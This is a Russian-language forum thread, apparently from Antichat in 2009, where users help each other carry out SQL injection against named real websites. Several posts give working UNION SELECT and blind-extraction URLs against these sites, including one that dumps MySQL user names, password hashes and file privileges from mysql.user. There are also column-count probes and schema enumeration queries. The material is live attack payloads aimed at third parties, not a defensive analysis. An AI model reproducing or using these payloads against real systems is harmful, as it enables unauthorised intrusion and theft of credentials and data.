04.05.2009, 01:14
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
2 geforce
1. Он уже ответил тебе, что скули в том параметре нет.
2. У тебя очень низкие познания в синтаксисе sql, прочти статью линк на которую он тебе дал (а ещё заодно статью от Dr.Z3r0).
3. Очень советую прочитать статью про инклуд.
Вообщем то инклуд достаточно серьезная уязвимость и повозиться с ним более чем разумно.
4. Не надо ни кого оскорблять.
2 Rev
Фразы "Друг ты помоему обкурился" и "Ламер" - это всё таки оффтоп и оскорбления.
Последний раз редактировалось Grey; 04.05.2009 в 01:20..
|
|
|
04.05.2009, 01:19
|
|
Banned
Регистрация: 03.05.2009
Сообщений: 8
С нами:
8959820
Репутация:
-59
|
|
geforce
дрЗиро ---- >http://forum.antichat.ru/thread43966.html
Не ну я так и не понял -10000 у меня в репе случится??
|
|
|
|
04.05.2009, 02:02
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242
я понял что тут скуль иньекция возможна
но при подборе колонок (union+select) я почему то их немогу подобрать(дошол до 30 но не увидел ничего)
в чем дело?
|
|
|
|
04.05.2009, 03:45
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242+and+ascii(substring((se lect+concat_ws(0x2F,table_name,table_schema,column _name)+from+information_schema.columns+where+colum n_name+like+0x257061737325+limit+0,1),1,1))>1--+
|
|
|
|
04.05.2009, 04:43
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Там рядом с выводом скуля:
http://www.witchvox.com/va/dt_va.html?a=usfl&c=notes&id=10154)+union+select+1 ,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,use r,password,host,file_priv),16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56, 57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73 ,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,9 0,91,92,93,94,95,96,97,98,99,100,101,102,103,104,1 05,106,107,108,109,110,111,112+from+mysql.user--+
--------------------------------------------------
К топу ниже:
http://www.placementindia.com/job-search/view_res.php?code=546588&res_ty=ml'+union+select+1 ,concat_ws(0x3a,'%3Ch1%3E',user(),version(),databa se(),'%3C/h1%3E')+--+
Последний раз редактировалось AkyHa_MaTaTa; 04.05.2009 в 05:32..
|
|
|
|
04.05.2009, 04:59
|
|
Новичок
Регистрация: 02.11.2008
Сообщений: 25
С нами:
9221480
Репутация:
55
|
|
http://www.placementindia.com/job-search/pi_fl_srch.php?offset=-1
Кто рассковыряет, тому будет всякое счастье  Я не смог. |
|
|
|
04.05.2009, 10:59
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
Сообщение от molotovkeyt
http://www.placementindia.com/job-search/pi_fl_srch.php?offset=-1
Кто рассковыряет, тому будет всякое счастье Я не смог. Там и не раскрутишь, тк инъекция в limit'е. Ищи другие инъекции, к примеру вот:
http://www.placementindia.com/job-recruiters/vac_hdetl.php?slno=238629'+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29+--+
Вывод присутствует.
|
|
|
|
04.05.2009, 21:02
|
|
Новичок
Регистрация: 08.12.2007
Сообщений: 21
С нами:
9697759
Репутация:
36
|
|
Кто сможет подсказать.
При помощи information_schema.schemata узнал имена используемых баз, а как узнать имена таблиц в конкретной базе?
Ведь как я понимаю по information_schema.tables выводятся имена таблиц во всех базах, а не в какой-то конкретной? Так ли, или я чего-то путаю?
|
|
|
|
04.05.2009, 21:12
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
select table_name from information_schema.tables where table_schema='blabla';
|
|
|
|
04.05.2009, 23:40
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
приятного времени суток....
Возник вопрос.
Смотрел статью : https://forum.antichat.ru/showpost.php?p=1047515&postcount=79
и не хрена не понял ))))
сайт : http://www.intes-online.de/cms/index.php?id=1
Order/group by 1
подскажите , это уже не в 1 раз
Ps: спс за время
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x59]ReV](/avatars/avatar84385.jpg?1257256){kind=avatar}
Похожие темы
Комбинированный вид
